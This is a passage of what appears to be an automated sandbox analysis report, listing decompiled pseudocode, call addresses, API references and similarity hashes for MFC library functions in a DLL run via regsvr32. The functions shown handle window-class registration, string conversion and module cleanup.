				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000EC09(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E10020F40(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000EC09(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x10048658; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E1000D010(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1000D1B3(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1000D1B3(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}



























                                                                                                            0x1000d1f4
                                                                                                            0x1000d1fa
                                                                                                            0x1000d1ff
                                                                                                            0x1000d207
                                                                                                            0x1000d207
                                                                                                            0x1000d20a
                                                                                                            0x00000000
                                                                                                            0x1000d20e
                                                                                                            0x1000d214
                                                                                                            0x1000d215
                                                                                                            0x1000d216
                                                                                                            0x1000d220
                                                                                                            0x1000d222
                                                                                                            0x1000d22f
                                                                                                            0x1000d232
                                                                                                            0x1000d237
                                                                                                            0x1000d240
                                                                                                            0x1000d243
                                                                                                            0x1000d248
                                                                                                            0x1000d249
                                                                                                            0x1000d24c
                                                                                                            0x1000d24f
                                                                                                            0x1000d254
                                                                                                            0x1000d255
                                                                                                            0x1000d25c
                                                                                                            0x1000d263
                                                                                                            0x1000d268
                                                                                                            0x1000d26a
                                                                                                            0x1000d26c
                                                                                                            0x1000d26c
                                                                                                            0x1000d26c
                                                                                                            0x1000d26a
                                                                                                            0x1000d26d
                                                                                                            0x1000d271
                                                                                                            0x1000d273
                                                                                                            0x1000d27d
                                                                                                            0x1000d27e
                                                                                                            0x1000d285
                                                                                                            0x1000d28a
                                                                                                            0x1000d28c
                                                                                                            0x1000d28e
                                                                                                            0x1000d28e
                                                                                                            0x1000d28e
                                                                                                            0x1000d28c
                                                                                                            0x1000d291
                                                                                                            0x1000d295
                                                                                                            0x1000d29a
                                                                                                            0x1000d29b
                                                                                                            0x1000d29e
                                                                                                            0x1000d2a5
                                                                                                            0x1000d2ac
                                                                                                            0x1000d2b1
                                                                                                            0x1000d2b3
                                                                                                            0x1000d2b5
                                                                                                            0x1000d2b5
                                                                                                            0x1000d2b5
                                                                                                            0x1000d2b3
                                                                                                            0x1000d2b8
                                                                                                            0x1000d2bc
                                                                                                            0x1000d2cc
                                                                                                            0x1000d2cf
                                                                                                            0x1000d2d2
                                                                                                            0x1000d2d7
                                                                                                            0x1000d2d9
                                                                                                            0x1000d2db
                                                                                                            0x1000d2db
                                                                                                            0x1000d2db
                                                                                                            0x1000d2d9
                                                                                                            0x1000d2de
                                                                                                            0x1000d2e1
                                                                                                            0x1000d2f1
                                                                                                            0x1000d2f8
                                                                                                            0x1000d2ff
                                                                                                            0x1000d304
                                                                                                            0x1000d306
                                                                                                            0x1000d308
                                                                                                            0x1000d308
                                                                                                            0x1000d308
                                                                                                            0x1000d306
                                                                                                            0x1000d30a
                                                                                                            0x1000d30e
                                                                                                            0x1000d319
                                                                                                            0x1000d325
                                                                                                            0x1000d327
                                                                                                            0x1000d327
                                                                                                            0x1000d327
                                                                                                            0x1000d327
                                                                                                            0x1000d32e
                                                                                                            0x1000d332
                                                                                                            0x1000d33a
                                                                                                            0x1000d346
                                                                                                            0x1000d346
                                                                                                            0x1000d346
                                                                                                            0x1000d348
                                                                                                            0x1000d34c
                                                                                                            0x1000d357
                                                                                                            0x1000d363
                                                                                                            0x1000d363
                                                                                                            0x1000d363
                                                                                                            0x1000d36a
                                                                                                            0x1000d36d
                                                                                                            0x1000d374
                                                                                                            0x1000d37c
                                                                                                            0x1000d37c
                                                                                                            0x1000d37c
                                                                                                            0x1000d383
                                                                                                            0x1000d386
                                                                                                            0x1000d38d
                                                                                                            0x1000d399
                                                                                                            0x1000d399
                                                                                                            0x1000d399
                                                                                                            0x1000d3a0
                                                                                                            0x1000d3a3
                                                                                                            0x1000d3aa
                                                                                                            0x1000d3b6
                                                                                                            0x1000d3b6
                                                                                                            0x1000d3b6
                                                                                                            0x1000d3bd
                                                                                                            0x1000d3c0
                                                                                                            0x1000d3c7
                                                                                                            0x1000d3d3
                                                                                                            0x1000d3d3
                                                                                                            0x1000d3d3
                                                                                                            0x1000d3da
                                                                                                            0x1000d3dd
                                                                                                            0x1000d3e4
                                                                                                            0x1000d3f0
                                                                                                            0x1000d3f0
                                                                                                            0x1000d3f0
                                                                                                            0x1000d3f7
                                                                                                            0x1000d3fa
                                                                                                            0x1000d401
                                                                                                            0x1000d40d
                                                                                                            0x1000d40d
                                                                                                            0x1000d40d
                                                                                                            0x1000d414
                                                                                                            0x1000d417
                                                                                                            0x1000d41e
                                                                                                            0x1000d426
                                                                                                            0x1000d426
                                                                                                            0x1000d426
                                                                                                            0x1000d42d
                                                                                                            0x1000d430
                                                                                                            0x1000d437
                                                                                                            0x1000d43f
                                                                                                            0x1000d43f
                                                                                                            0x1000d43f
                                                                                                            0x1000d446
                                                                                                            0x1000d449
                                                                                                            0x1000d450
                                                                                                            0x1000d45c
                                                                                                            0x1000d45c
                                                                                                            0x1000d45c
                                                                                                            0x1000d463
                                                                                                            0x1000d466
                                                                                                            0x1000d46d
                                                                                                            0x1000d479
                                                                                                            0x1000d479
                                                                                                            0x1000d479
                                                                                                            0x1000d480
                                                                                                            0x1000d483
                                                                                                            0x1000d48a
                                                                                                            0x1000d492
                                                                                                            0x1000d492
                                                                                                            0x1000d492
                                                                                                            0x1000d494
                                                                                                            0x1000d497
                                                                                                            0x1000d49a
                                                                                                            0x1000d4a6
                                                                                                            0x1000d4a8
                                                                                                            0x1000d4ad
                                                                                                            0x1000d4b0
                                                                                                            0x1000d4b0
                                                                                                            0x1000d4b0
                                                                                                            0x1000d4bf
                                                                                                            0x1000d4c1
                                                                                                            0x1000d4c1
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memset
                                                                                                            • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                            • API String ID: 2102423945-4122032997
                                                                                                            • Opcode ID: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
                                                                                                            • Instruction ID: 8836cd366f4edbb263e832dd9095b9ce1b533ce8c5134698fb64192b8290e0ae
                                                                                                            • Opcode Fuzzy Hash: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
                                                                                                            • Instruction Fuzzy Hash: 7C8130B5C00259AAFB51DFE4C585BDEBBF8EF043C4F118166F908E6185E7749A84CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100121BA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E100121BA(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10045580; // 0x8f64cb61
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E10011FFD(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E10012028(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100203EC(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E1001213D(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E1001213D(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1001FBB5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}



























                                                                                                            0x100121ba
                                                                                                            0x100121ba
                                                                                                            0x100121ba
                                                                                                            0x100121c0
                                                                                                            0x100121c7
                                                                                                            0x100121ce
                                                                                                            0x100121d4
                                                                                                            0x100121d7
                                                                                                            0x100121e0
                                                                                                            0x100121e1
                                                                                                            0x100121ea
                                                                                                            0x100121f8
                                                                                                            0x100121fb
                                                                                                            0x10012203
                                                                                                            0x10012219
                                                                                                            0x1001221b
                                                                                                            0x1001221e
                                                                                                            0x10012226
                                                                                                            0x10012220
                                                                                                            0x10012220
                                                                                                            0x10012220
                                                                                                            0x10012235
                                                                                                            0x100122b3
                                                                                                            0x100122b3
                                                                                                            0x10012237
                                                                                                            0x1001224c
                                                                                                            0x10012251
                                                                                                            0x10012254
                                                                                                            0x00000000
                                                                                                            0x10012256
                                                                                                            0x10012257
                                                                                                            0x1001225d
                                                                                                            0x10012262
                                                                                                            0x10012264
                                                                                                            0x1001226a
                                                                                                            0x1001226f
                                                                                                            0x10012273
                                                                                                            0x10012273
                                                                                                            0x10012277
                                                                                                            0x1001227b
                                                                                                            0x1001227e
                                                                                                            0x10012282
                                                                                                            0x10012285
                                                                                                            0x1001228c
                                                                                                            0x1001228f
                                                                                                            0x10012297
                                                                                                            0x10012291
                                                                                                            0x10012291
                                                                                                            0x10012291
                                                                                                            0x1001229e
                                                                                                            0x100122c3
                                                                                                            0x100122ca
                                                                                                            0x100122d3
                                                                                                            0x100122db
                                                                                                            0x100122e8
                                                                                                            0x100122eb
                                                                                                            0x100122f1
                                                                                                            0x100122f7
                                                                                                            0x100122a5
                                                                                                            0x100122a5
                                                                                                            0x100122ac
                                                                                                            0x100122b1
                                                                                                            0x100122bb
                                                                                                            0x100122c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100122b1
                                                                                                            0x1001229e
                                                                                                            0x10012254
                                                                                                            0x100122f8
                                                                                                            0x100122f9
                                                                                                            0x100121d9
                                                                                                            0x100121d9
                                                                                                            0x100121d9
                                                                                                            0x10012306

                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 100121E4
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1001222C
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10012246
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                            • String ID: @
                                                                                                            • API String ID: 1529587224-2766056989
                                                                                                            • Opcode ID: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
                                                                                                            • Instruction ID: d0a0353f3703c4703b37301af5c7bc2eef77f2bc52e41b95a60fad612e9c4f7d
                                                                                                            • Opcode Fuzzy Hash: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
                                                                                                            • Instruction Fuzzy Hash: 0041AFB1900219EFDB15CFA4CC85AAEBBB5FF04350F148629E812EF185E774E9A5CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013B33 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10013B33(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E1001FC2D(E10033E8D, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003876c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E100124A0(_t59, _t59 + 0x24, _t75);
						E10010BA6(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E10010D56(_t59, 0x1003b23c) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E1001B91E(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E10012675(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E100066CE(_t59);
						return E1001FCB0(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E1001B865(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E100132FB(_t76);
							_push(_t76);
							E10004D75(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E1000911A(_t77 - 0x24)));
						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E1001B896(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E100132FB(_t76);
									_push(_t76);
									E10004D75(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}










                                                                                                            0x10013b33
                                                                                                            0x10013b33
                                                                                                            0x10013b33
                                                                                                            0x10013b3a
                                                                                                            0x10013b3f
                                                                                                            0x10013b41
                                                                                                            0x10013b44
                                                                                                            0x10013b4a
                                                                                                            0x10013b4f
                                                                                                            0x10013b56
                                                                                                            0x10013b59
                                                                                                            0x10013ba1
                                                                                                            0x10013ba5
                                                                                                            0x10013bcb
                                                                                                            0x10013bce
                                                                                                            0x10013bd7
                                                                                                            0x10013bdc
                                                                                                            0x10013be3
                                                                                                            0x10013bf2
                                                                                                            0x10013bf4
                                                                                                            0x10013bf9
                                                                                                            0x10013bfc
                                                                                                            0x10013bfd
                                                                                                            0x10013bfe
                                                                                                            0x10013c04
                                                                                                            0x10013c05
                                                                                                            0x10013c0d
                                                                                                            0x10013c15
                                                                                                            0x10013c1d
                                                                                                            0x10013c22
                                                                                                            0x10013c24
                                                                                                            0x10013c1d
                                                                                                            0x10013c25
                                                                                                            0x10013c2b
                                                                                                            0x10013c2b
                                                                                                            0x10013c31
                                                                                                            0x10013c35
                                                                                                            0x10013c3d
                                                                                                            0x10013c41
                                                                                                            0x10013c46
                                                                                                            0x10013c4c
                                                                                                            0x10013c56
                                                                                                            0x10013c56
                                                                                                            0x10013ba7
                                                                                                            0x10013baa
                                                                                                            0x10013bb1
                                                                                                            0x10013bb3
                                                                                                            0x10013bb5
                                                                                                            0x10013bb9
                                                                                                            0x10013bbe
                                                                                                            0x10013bbf
                                                                                                            0x10013bc4
                                                                                                            0x10013bc5
                                                                                                            0x00000000
                                                                                                            0x10013b5b
                                                                                                            0x10013b5b
                                                                                                            0x10013b5e
                                                                                                            0x10013b5e
                                                                                                            0x10013b6c
                                                                                                            0x10013b70
                                                                                                            0x10013b72
                                                                                                            0x10013b77
                                                                                                            0x10013b79
                                                                                                            0x10013b80
                                                                                                            0x10013b87
                                                                                                            0x10013b8e
                                                                                                            0x10013b93
                                                                                                            0x10013b94
                                                                                                            0x10013b99
                                                                                                            0x10013b80
                                                                                                            0x10013b77
                                                                                                            0x10013b9a
                                                                                                            0x10013b9d
                                                                                                            0x00000000
                                                                                                            0x10013b5e

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 10013B3A
                                                                                                            • GetModuleHandleA.KERNEL32(?,1003B23C,00000000), ref: 10013C05
                                                                                                            • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 10013C15
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                            • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                            • API String ID: 2418878492-2500072749
                                                                                                            • Opcode ID: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
                                                                                                            • Instruction ID: effe031cbf4f857fff4e6ce51dcecab954aad45063f71112ee54279e012bf132
                                                                                                            • Opcode Fuzzy Hash: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
                                                                                                            • Instruction Fuzzy Hash: 8931AD75A046049FDF05DFA0C8857AE77F9EF48340F014098E905AF292EB79E985CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10014290 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10014290(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E1001FC2D(E10033F1F, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038078;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E100136F0(_t91 - 0x54, 0x11) != 0 || E100136F0(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
